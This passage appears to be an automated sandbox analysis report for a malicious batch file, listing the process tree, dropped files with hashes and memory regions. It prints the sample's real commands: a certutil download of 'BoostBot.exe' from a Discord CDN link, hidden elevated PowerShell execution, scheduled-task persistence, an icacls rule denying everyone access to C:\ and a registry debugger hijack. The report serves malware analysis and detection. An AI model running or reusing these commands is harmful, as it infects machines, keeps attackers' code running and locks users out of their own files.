                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                      1⤵
                                                        PID:1904
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                        1⤵
                                                          PID:1912
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                          1⤵
                                                            PID:1956
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                            1⤵
                                                              PID:1984
                                                            • C:\Windows\System32\spoolsv.exe
                                                              C:\Windows\System32\spoolsv.exe
                                                              1⤵
                                                                PID:1708
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                1⤵
                                                                  PID:2072
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                  1⤵
                                                                    PID:2284
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                    1⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2316
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                    1⤵
                                                                      PID:2432
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                      1⤵
                                                                        PID:2440
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                        1⤵
                                                                        • Drops file in System32 directory
                                                                        PID:2624
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                        1⤵
                                                                          PID:2728
                                                                        • C:\Windows\sysmon.exe
                                                                          C:\Windows\sysmon.exe
                                                                          1⤵
                                                                            PID:2744
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                            1⤵
                                                                              PID:2756
                                                                            • C:\Windows\System32\svchost.exe
                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                              1⤵
                                                                                PID:2764
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                1⤵
                                                                                  PID:2772
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:2952
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                    1⤵
                                                                                      PID:740
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                      1⤵
                                                                                        PID:3372
                                                                                      • C:\Windows\Explorer.EXE
                                                                                        C:\Windows\Explorer.EXE
                                                                                        1⤵
                                                                                          PID:3416
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fix.bat"
                                                                                            2⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:2488
                                                                                            • C:\Windows\system32\certutil.exe
                                                                                              certutil -urlcache -split -f "https://cdn.discordapp.com/attachments/1237881664131174481/1239282786335064204/BoostBot.exe?ex=66425b89&is=66410a09&hm=76121e524db94e51397af0fa52812c443a6cb5a194da52bb2909deb394f90aee&" BoostBot.exe
                                                                                              3⤵
                                                                                                PID:2576
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Process -FilePath 'BoostBot.exe' -Verb RunAs"
                                                                                                3⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:4956
                                                                                                • C:\Users\Admin\AppData\Local\Temp\BoostBot.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\BoostBot.exe"
                                                                                                  4⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:2604
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\BoostBot.exe" /rl HIGHEST /f
                                                                                                    5⤵
                                                                                                    • Creates scheduled task(s)
                                                                                                    PID:4924
                                                                                                  • C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"
                                                                                                    5⤵
                                                                                                    • Checks computer location settings
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:4568
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f
                                                                                                      6⤵
                                                                                                      • Creates scheduled task(s)
                                                                                                      PID:3056
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:840
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      "schtasks" /delete /tn "$sxr-powershell" /f
                                                                                                      6⤵
                                                                                                        PID:4072
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          7⤵
                                                                                                            PID:4180
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Avg54qrl4EQM.bat" "
                                                                                                          6⤵
                                                                                                            PID:4960
                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              7⤵
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:4620
                                                                                                            • C:\Windows\SysWOW64\chcp.com
                                                                                                              chcp 65001
                                                                                                              7⤵
                                                                                                                PID:1676
                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                ping -n 10 localhost
                                                                                                                7⤵
                                                                                                                • Runs ping.exe
                                                                                                                PID:4676
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                                              6⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4912
                                                                                                            • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                                              "SCHTASKS.exe" /create /tn "$77$sxr-powershell.exe" /tr "'C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe'" /sc onlogon /rl HIGHEST
                                                                                                              6⤵
                                                                                                              • Creates scheduled task(s)
                                                                                                              PID:2912
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:3448
                                                                                                          • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                                            "SCHTASKS.exe" /create /tn "$77BoostBot.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\BoostBot.exe'" /sc onlogon /rl HIGHEST
                                                                                                            5⤵
                                                                                                            • Creates scheduled task(s)
                                                                                                            PID:2456
                                                                                                      • C:\Windows\system32\icacls.exe
                                                                                                        icacls "C:\" /deny *S-1-1-0:(OI)(CI)F /T
                                                                                                        3⤵
                                                                                                        • Modifies file permissions
                                                                                                        PID:2588
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Executable File Execution Options\cmd.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f
                                                                                                        3⤵
                                                                                                          PID:4196
                                                                                                        • C:\Windows\system32\attrib.exe
                                                                                                          attrib +h "C:\Users\Admin\AppData\Local\Temp\Fix.bat"
                                                                                                          3⤵
                                                                                                          • Views/modifies file attributes
                                                                                                          PID:1060
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                      1⤵
                                                                                                        PID:3564
                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                        1⤵
                                                                                                          PID:3764
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:3924
                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                            1⤵
                                                                                                              PID:4164
                                                                                                            • C:\Windows\system32\SppExtComObj.exe
                                                                                                              C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:4944
                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                1⤵
                                                                                                                  PID:4488
                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                  1⤵
                                                                                                                    PID:3828
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                    1⤵
                                                                                                                      PID:1448
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                      1⤵
                                                                                                                        PID:4504
                                                                                                                      • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                        "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                        1⤵
                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                        PID:368
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                        1⤵
                                                                                                                          PID:3364
                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                          1⤵
                                                                                                                            PID:2836
                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                            1⤵
                                                                                                                              PID:3720
                                                                                                                            • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                              C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                              1⤵
                                                                                                                              • Checks BIOS information in registry
                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                              • Enumerates system info in registry
                                                                                                                              PID:1952

                                                                                                                            Network

                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                            Replay Monitor

                                                                                                                            Loading Replay Monitor...

                                                                                                                            Downloads

                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                              Filesize

                                                                                                                              338B

                                                                                                                              MD5

                                                                                                                              8b5939ce90f9c01c0fb7f6aa5c98903c

                                                                                                                              SHA1

                                                                                                                              0db302d0e2c482a4ee43d84d7210196907bfe059

                                                                                                                              SHA256

                                                                                                                              ace0e21d782e19c61280bd88657b910bf9c5eb99d9b5fad7d7cad769763ea079

                                                                                                                              SHA512

                                                                                                                              c8edc146c103ef94ee1e47241b0ad0a8360261bcd97422f7c94bd75562ad2d5ba4116065d7c656e82bd16be2a9bcafa2c8e96675fa841431e7e9d90bcc04e98e

                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5E5B0733CDA24F9EF7038FEEB6987C6E

                                                                                                                              Filesize

                                                                                                                              556B

                                                                                                                              MD5

                                                                                                                              2ced9657e754899c9c21e35e62cfd749

                                                                                                                              SHA1

                                                                                                                              28dbd30d60f4733b3eec9d19ee7d359c5d98f361

                                                                                                                              SHA256

                                                                                                                              37dcdc9e04ab5281dcbed4bbdf020b3b740f69d204185da6c5b0eaa6e168d063

                                                                                                                              SHA512

                                                                                                                              f3bc0cdd6d35906474eeb3a0611459c7b2a748c07a2637ed68c0c1358cfbac1ebb888fc83cbc8a3b16d194ceb2112ef1b11a05b66fd879b25090fbe367702e1b

                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

                                                                                                                              Filesize

                                                                                                                              408B

                                                                                                                              MD5

                                                                                                                              5052db06a91eb8c8a739038cc002bade

                                                                                                                              SHA1

                                                                                                                              7f1dbd014d1c13635ba4e109fbc1f3bb152e0d6b

                                                                                                                              SHA256

                                                                                                                              996281dd0067c6b4ac2edf10a674b5f38be7e6bca90b3f3224c878f0d6a83e4c

                                                                                                                              SHA512

                                                                                                                              edfeff2cb63e12b1dfcbc1f0102622f37a9707e623612e1d728cd6eb042294dc22f047e737654fb0e4f019058581b1e856177f4701d5906cdb6999a31a64eac8

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Avg54qrl4EQM.bat

                                                                                                                              Filesize

                                                                                                                              283B

                                                                                                                              MD5

                                                                                                                              c75400c3c7beb504e9d6b3a834458ecb

                                                                                                                              SHA1

                                                                                                                              6f59643718ba05e1e35a5d4c833e903f8b0b6dad

                                                                                                                              SHA256

                                                                                                                              44388d6dfefab755e11db96f23bdba57f28e5d54951b1996a28a901631137748

                                                                                                                              SHA512

                                                                                                                              8c564cc4c74dd5ac7b80a54c950ba565c47bbc8865036d1284673f3c2debe74322b979b9e925ef0315eb12b30335d625f77b0f611e041cb207a9113c0df2e036

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\BoostBot.exe

                                                                                                                              Filesize

                                                                                                                              409KB

                                                                                                                              MD5

                                                                                                                              404ab800bbe49c36bd64d0d73600b59a

                                                                                                                              SHA1

                                                                                                                              4c8dff2702fada108f7477ad357067310b584366

                                                                                                                              SHA256

                                                                                                                              5465f02f24ee5c1fc9c9c27c86c209eeddc2ed607143e1b76ca9c9d9b7b84154

                                                                                                                              SHA512

                                                                                                                              d0ecd88adfd84d9d8e845281e0437368aadf3d1d6fb704d7c7630d1360697471c2a49584f968eeebd5b435f11af9ce3d06327f1835fa5d07a140f22c0f95fc11

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ls5mhgyz.saq.ps1

                                                                                                                              Filesize

                                                                                                                              60B

                                                                                                                              MD5

                                                                                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                              SHA1

                                                                                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                              SHA256

                                                                                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                              SHA512

                                                                                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\install.exe

                                                                                                                              Filesize

                                                                                                                              162KB

                                                                                                                              MD5

                                                                                                                              152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                              SHA1

                                                                                                                              c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                              SHA256

                                                                                                                              a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                              SHA512

                                                                                                                              2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                                            • C:\Users\Admin\AppData\Roaming\$SXR-LOGS\05-12-~1

                                                                                                                              Filesize

                                                                                                                              224B

                                                                                                                              MD5

                                                                                                                              d984f95dba925797a557b7d54cd5b33e

                                                                                                                              SHA1

                                                                                                                              fd51c43e1bfad47acd849c0cbc1b3b44eb06a602

                                                                                                                              SHA256

                                                                                                                              9e7f981c7272441ea30bcb30a3f4984819a8eaa4cbe2e17df3c091b1cec37e65

                                                                                                                              SHA512

                                                                                                                              1af46a82dc0054527bb9c5c61fc0bb34760c53f04d2ae20584f04eed452b12972613bde778ff696617a715f5057e44682ef09610bdf97f3b0ec5bac5d1fb8c65

                                                                                                                            • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                              Filesize

                                                                                                                              2KB

                                                                                                                              MD5

                                                                                                                              2f57fde6b33e89a63cf0dfdd6e60a351

                                                                                                                              SHA1

                                                                                                                              445bf1b07223a04f8a159581a3d37d630273010f

                                                                                                                              SHA256

                                                                                                                              3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                                                                                                              SHA512

                                                                                                                              42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                                                                                                            • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                              Filesize

                                                                                                                              1KB

                                                                                                                              MD5

                                                                                                                              aa187cac09f051e24146ad549a0f08a6

                                                                                                                              SHA1

                                                                                                                              2ef7fae3652bb838766627fa6584a6e3b5e74ff3

                                                                                                                              SHA256

                                                                                                                              7036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f

                                                                                                                              SHA512

                                                                                                                              960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2

                                                                                                                            • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                              Filesize

                                                                                                                              160B

                                                                                                                              MD5

                                                                                                                              7737ca556c4aa13674eb3008497d0b7c

                                                                                                                              SHA1

                                                                                                                              3bcfabc04e890f4f6a6af693855798d6f32261ff

                                                                                                                              SHA256

                                                                                                                              2cc2817893d81214c0504ec7c1ac00b9712ccf1c0bd4b3b01370ea0ab81ac561

                                                                                                                              SHA512

                                                                                                                              16b0d0bf36481a5c2a55a946c53ed260a0d5fd157389626d68f1a8d1f20b07fa6628237796eb4ad7dce21cd06ba7818219f2cb07cec55c9bf7fb9742e11d2bd2

                                                                                                                            • memory/336-123-0x000002B1F9EE0000-0x000002B1F9F0B000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/336-117-0x000002B1F9EE0000-0x000002B1F9F0B000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/336-124-0x00007FFE01AB0000-0x00007FFE01AC0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/416-128-0x000001AF63EE0000-0x000001AF63F0B000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/612-91-0x00007FFE01AB0000-0x00007FFE01AC0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/612-84-0x0000022AA8C80000-0x0000022AA8CAB000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/612-82-0x0000022AA8C50000-0x0000022AA8C75000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              148KB

                                                                                                                            • memory/612-83-0x0000022AA8C80000-0x0000022AA8CAB000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/612-90-0x0000022AA8C80000-0x0000022AA8CAB000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/672-101-0x0000019619300000-0x000001961932B000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/672-95-0x0000019619300000-0x000001961932B000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/672-102-0x00007FFE01AB0000-0x00007FFE01AC0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/952-113-0x00007FFE01AB0000-0x00007FFE01AC0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/952-106-0x000001B99C640000-0x000001B99C66B000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/952-112-0x000001B99C640000-0x000001B99C66B000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              172KB

                                                                                                                            • memory/1592-67-0x00007FFE41A30000-0x00007FFE41C25000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              2.0MB

                                                                                                                            • memory/1592-68-0x00007FFE41240000-0x00007FFE412FE000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              760KB

                                                                                                                            • memory/1592-66-0x0000019C33330000-0x0000019C3335A000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              168KB

                                                                                                                            • memory/2604-32-0x0000000006180000-0x00000000061BC000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              240KB

                                                                                                                            • memory/2604-31-0x0000000005580000-0x0000000005592000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              72KB

                                                                                                                            • memory/2604-27-0x00000000004C0000-0x000000000052C000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              432KB

                                                                                                                            • memory/2604-28-0x00000000055F0000-0x0000000005B94000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              5.6MB

                                                                                                                            • memory/2604-29-0x0000000004F10000-0x0000000004FA2000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              584KB

                                                                                                                            • memory/2604-30-0x0000000004FB0000-0x0000000005016000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              408KB

                                                                                                                            • memory/3368-70-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/3368-77-0x00007FFE41240000-0x00007FFE412FE000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              760KB

                                                                                                                            • memory/3368-69-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/3368-72-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/3368-71-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/3368-79-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/3368-75-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              32KB

                                                                                                                            • memory/3368-76-0x00007FFE41A30000-0x00007FFE41C25000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              2.0MB

                                                                                                                            • memory/4568-56-0x0000000006570000-0x000000000657A000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              40KB

                                                                                                                            • memory/4956-9-0x00007FFE23A13000-0x00007FFE23A15000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              8KB

                                                                                                                            • memory/4956-26-0x00007FFE23A10000-0x00007FFE244D1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/4956-21-0x00007FFE23A10000-0x00007FFE244D1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/4956-20-0x00007FFE23A10000-0x00007FFE244D1000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/4956-15-0x000001F6ADFB0000-0x000001F6ADFD2000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              136KB